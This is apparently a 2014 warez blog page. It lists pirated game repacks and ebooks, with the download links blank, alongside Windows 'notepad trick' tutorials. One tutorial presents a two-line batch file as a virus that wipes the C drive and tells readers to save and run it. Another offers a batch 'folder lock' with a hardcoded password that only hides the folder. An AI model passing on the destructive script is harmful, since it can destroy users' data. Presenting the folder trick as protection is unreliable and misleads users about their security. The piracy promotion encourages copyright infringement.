Friday, August 22, 2014

DEAD ISLAND RIPTIDE[REPACK-KAOS|BLACKBOX]




DEVELOPER:TECHLAND

PUBLISHER:DEEP SILVER

RELEASE DATE:23 APRIL 2013

SIZE:2.47GB

REQUIREMENTS:CORE 2 DUO 2.66GHZ,4GB RAM,GRAPHIC CARD 512 MB,7 GB HDD,WINDOWS XP/VISTA/7

DESCRIPTION:



Dead Island Riptide, Unique Hack and Slash Game

Dead Island Riptide-RELOADED ISO is good great game to download. You will find that it’s not only the hack and slash game, but, there are lots of interesting feature you can find.

The first one would be the weapon. There are many choices you can find, from axe to Gatling gun. Next is the environment. Because you are in an island, it’s not like many other hacks and slash game that use city or dungeon. Maybe that’s the reason why Dead Island Riptide-RELOADED ISO has big size.So I am uploading the blackbox version of game which is small in size.














LINKS HERE:








PROBABILITY,RANDOM VARIABLES AND STOCHASTIC PROCESS,3RD EDITION,PAPOULIS




It is designed for graduate level of courses,the text has defined the course of study in probability theory,highly regarded for its strong mathematical orientation and comprehensive coverage ,the text cover the probability,random variables and stochastic process very logically,carefully incorpoarate a wide range of illustrations and examples,new methods ,problems and applications in probability.






















Sunday, August 17, 2014

TRANSFORMERS :RISE OF THE DARK SPARK [FULL ISO][9.21GB]






Developer:Edge of reality

Publisher:Activison blizzard

Genre:Action

Release date:24 june 2014

Requirements:Core 2 duo 2.6ghz,2 gb ram,graphic card 512mb,

10gb hdd,windows 7/8

DESCRIPTION:

You Can Also Selected Up To Hundred Characters And Every Character Have Lot Of Power And Own Abilities. It’s A Strategies Video Games Like To Play Anyone. This Diversion Sound System Is Very Good Quality. When You Started Play Online With Multiplayer And Its Totally Enjoyed. You Can Look To Map And Complete The Every Mission Very Fast. So Just Download And Start Play With Lot Of Enjoyable.



SCREENSHOTS:













LINKS HERE:















:

PROGRAMMING HTML 5 APPLICATIONS








HTML5 is not just a replacement for plugins. It also makes the Web a first-class development environment by giving JavaScript programmers a solid foundation for building industrial-strength applications. This practical guide takes you beyond simple site creation and shows you how to build self-contained HTML5 applications that can run on mobile devices and compete with desktop apps.


You’ll learn powerful JavaScript tools for exploiting HTML5 elements, and discover new methods for working with data, such as offline storage and multithreaded processing. Complete with code samples, this book is ideal for experienced JavaScript and mobile developers alike.
Store session data in the browser with local storage objects
Save trips to the server: store larger amounts of data with IndexedDB
Give browsers limited access to a user’s system to read and upload files
Take your app offline—and speed up page loading when it’s online
Use Web Workers to create multithreaded applications
Transfer data between browser and server more efficiently with Web Sockets
Learn about HTML5 tags for forms, multimedia, graphics, and geolocation


"HTML5 is all the rage these days, but it's more than just a buzzword. Programming HTML5 Applications provides the knowledge to guide you through all the new technologies needed to make modern web applications."

--Ralph Whitbeck, cohost of The Official jQuery Podcast



HTML 5 COOKBOOK




With scores of practical recipes you can use in your projects right away, this cookbook helps you gain hands-on experience with HTML5’s versatile collection of elements. You get clear solutions for handling issues with everything from markup semantics, web forms, and audio and video elements to related technologies such as geolocation and rich JavaScript APIs.

Each informative recipe includes sample code and a detailed discussion on why and how the solution works. Perfect for intermediate to advanced web and mobile web developers, this handy book lets you choose the HTML5 features that work for you—and helps you experiment with the rest.
Test browsers for HTML5 support, and use techniques for applying unsupported features
Discover how HTML5 makes web form implementation much simpler
Overcome challenges for implementing native audio and video elements
Learn techniques for using HTML5 with ARIA accessibility guidelines
Explore examples that cover using geolocation data in your applications
Draw images, use transparencies, add gradients and patterns, and more with Canvas
Bring HTML5 features to life with a variety of advanced JavaScript APIs


CREATING HTML5 ANIMATIONS WITH FLASH AND WALLABY







Creating standards-compliant animations for the Web just got a lot easier. With this concise guide, you’ll learn how to convert Flash animations into HTML5, using Wallaby—the experimental tool from Adobe. Wallaby makes Flash content available for devices that don't support Flash runtimes, including the iPhone and iPad.

Developing HTML5 animations is time-consuming with all the coding required. This book shows you how to create compelling content for HTML5 environments with relative ease, whether you know Flash or not. After a quick introduction to simple animation building with Flash, you'll learn how Wallaby helps you convert those animations into HTML5 code.
Learn how to create a simple Flash animation, using Flash Professional CS5
Become familiar with the Flash Library, Stage drawing canvas, and animation Timeline
Take the right approach to building a complex Flash animation for HTML5
Get performance tips to optimize animations for desktops and mobile devices
Use simple JavaScript and CSS code to place the Wallaby animation in a web page
Add interactivity to your HTML5 animation with jQuery



PASSWORD PROTECT ANY FOLDER WITHOUT ANY SOFTWARE








In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.


How To Lock Folder ?


1. Open Notepad and Copy code given below into it.


cls

@ECHO OFF

title coolhacking-tricks.blogspot.com

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" gotoUNLOCK

if NOT EXIST MyFolder goto MDMyFolder

:CONFIRM

echo Are you sure to lock this folder? (Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to Unlock Your Secure Folder

set/p "pass=>"

if NOT %pass%== coolhacks goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDMyFolder

md MyFolder

echo MyFolder created successfully

goto End

:End


2. Save the notepad file as lock.bat (.bat is must)


3. Now double click on lock.bat and a new folder will be created with name MyFolder


4. Copy all your data you want to protect in that New folder


5. Now double click on lock.bat and when command promp appears Type Y and press enter.


6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat


7. It will ask for password enter your password and done. (Default password is coolhacks)
To change the password replace coolhacks with new password in the above code
How To Further Secure ?


You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it intoyour computer whenever you required to access to your protected files.

RAJNIKANTH WEBSITE DOESNOT REQUIRE INTERNET







As you all know about rajnikanth famous south superstar and his jokes and pj which are famous over interent but today i came across interesting site allaboutrajniwhich you can access only when your internet connection is off else it show error message. It contain rajnikanth jokes,stories,facts etc.




1. Visit www.allaboutrajni.com

2. To explore this site you need to remove your internet wire or turn off your laptop wifi swithch.

3. If you dont turn off then you will see below msg.



WEBPAGE TO PDF

CONVERT WEBPAGE TO PDF FILE






In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.



How To Save Web Page To PDF File ?


1. Open the Google Chrome Browser on your PC or MAC


2. Then go to the web page that you want to convert as a PDF.


3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.


4. Now Change the destination to “Save As PDF” and hit the save button.


5. The current web page will instantly be downloaded as a PDF document.







Saturday, August 16, 2014

REAL BOXING

REAL BOXING[REPACK-KAOS][640MB]






SCREENSHOTS:














LINKS HERE:






1001 MOTIVATIONAL QUOTES FOR SUCCESS

1001 MOTIVATIONAL QUOTES FOR SUCCESS: GREAT QUOTES  FROM GREAT MINDS.PDF





1001 Motivational Quotes for Success is a compilation of quotes from some of the greatest motivators and businessmen/women of our time. This is for anyone who wants the motivation and inspiration to achieve the dreams they may have, whether it's to become a better parent, a more successful businessman or businesswoman, or becoming a better student. Whatever it may be, we all have the ability to take control of our lives, and this book is filled with 1001 of the most inspirational messages to give you the energy and motivation to take action and achieve all that you are capable of achieving.




DANGEROUSLY MAD PROJECTS

15 DANGEROUSLY MAD PROJECTS FOR THE EVIL GENIUS[EBOOK]:










"Wonderful. I learned a lot reading the detailed but easy to understand instructions."--BoingBoing

This wickedly inventive guide explains how to design and build 15 fiendishly fun electronics projects. Filled with photos and illustrations, 15 Dangerously Mad Projects for the Evil Genius includes step-by-step directions, as well as a construction primer for those who are new to electronics projects.

Using easy-to-find components and equipment, this do-it-yourself book shows you how to create a variety of mischievous gadgets, such as a remote-controlled laser, motorized multicolored LEDs that write in the air, and a surveillance robot. You'll also learn to use the highly popular Arduino microcontroller board with three of the projects.

15 Dangerously Mad Projects for the Evil Genius:
Features step-by-step instructions and helpful illustrations
Covers essential safety measures
Reveals the scientific principles behind the projects
Removes the frustration factor--all required parts are listed, along with sources

Build these devious devices to amaze your friends and confound your enemies!
Coil gun
Trebuchet
Ping pong ball minigun
Mini laser turret
Balloon-popping laser gun
Touch-activated laser sight
Laser-grid intruder alarm
Persistence-of-vision display
Covert radio bug
Laser voice transmitter
Flash bomb
High-brightness LED strobe
Levitation machine
Snailbot
Surveillance robot

Each fun, inexpensive Evil Genius project includes a detailed list of materials, sources for parts, schematics, and lots of clear, well-illustrated instructions for easy assembly. The larger workbook-style layout and convenient two-column format make following the step-by-step instructions a breeze.

VIDEOS, PHOTOS, AND SOURCE CODE ARE AVAILABLE AT WWW.DANGEROUSLYMAD.COM

Make Great Stuff!
TAB, an imprint of McGraw-Hill Professional, is a leading publisher of DIY technology books for makers, hackers, and electronics hobbyists.

NOTEPAD TRICKS

TOP COOLEST NOTEPAD TRICKS:













1.MATRIX EFFECT:







In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.




1. Open Noteapad and copy below code into it.

@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start

2. Now save this file as Matrix.bat (name can be anything but .bat is must)

3. Open your saved file and you will have matrix effect on your screen



2.CREATING VIRUS THAT FORMAT C:DRIVE:










In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.




1. Open Notepad and copy below code into it.


@Echo off

Del C:\ *.* |y



2. Then Save this file as virus.bat

3. Now, running this file format C Drive.




3.MAKING PERSONAL DAIRY USING NOTEPAD:













Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.



1. Open Notepad and Type .LOG (in capital Letters and press enter


2. Save the program with any name and close it.


3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad




4.TO COVERT WRITTEN TEXT INTO VOICE


here i can show u how notepad tell the text what u have written.so that notepad speech out the text which is written inside notepad



1.open 'notepad' and copy the below code

2.Dim message, sapi


message=InputBox("What do you want me to say?","gamesdoodle")


Set sapi=CreateObject("sapi.spvoice")


sapi.Speak message

3.save the above code in notepad as '.vbs'






1001 FACTS THAT WILL SCARE U

1001 FACTS THAT WILL SCARE S#*T OUT OF U[EBOOK]





SNAPSHOTS:











Fact: Chocolate contains the alkaloid theobromine, which in high doses can be toxic to humans, and in even small amounts can kill dogs, parrots, horses, and cats.
This means that despite its name, the Kit-Kat candy bar is not a recommended snack for your kitty-cat. I wonder how many cats have died because of this confusion.

Fact: The most germ-laden place on your toilet isn't the seat or even the bowl--it's the handle.
The solution: Don't flush. Let the next guy worry about it.

There are "just the facts"--and then there are just the facts that will frighten the bejeezus out of you. And thanks to this little gem of a bathroom book, you'll never look at the world the same way again, without, er, dry heaving a little bit.

From the sneaky fish that can swim up our genitals to the E. coli bacteria lurking in the very water we drink, disturbing phenomena are everywhere we turn. Educational, entertaining, and undeniably horrifying, this book isn't guaranteed to help you, um, go to the bathroom, but it's certain to make your time there more...informed.











BATTLEFIELD 4

BATTLEFIELD 4[REPACK-BLACKBOX][17.46GB]







SCREENSHOTS:
















LINKS HERE:























GRID

GRID:AUTOSPORT[FULL ISO][8.37 GB]






SCREENSHOTS:












LINKS HERE:





















ASSASSINS CREED IV

ASSASSINS CREED IV:BLACKFLAG[REPACK-BLACKBOX][5.55GB]



SCREENSHOTS:













LINKS HERE:












ASSASSINS CREED III

ASSASSINS CREED III+DELUXE EDITION DLC[REPACK-BLACKBOX][5.44GB]




SCREENSHOTS:








LINKS HERE:


















ASSASSINS CREED REVELATIONS

ASSASSINS CREED REVELATIONS[REPACK-BLACKBOX][3.25GB]




SCREENSHOTS :









LINKS HERE: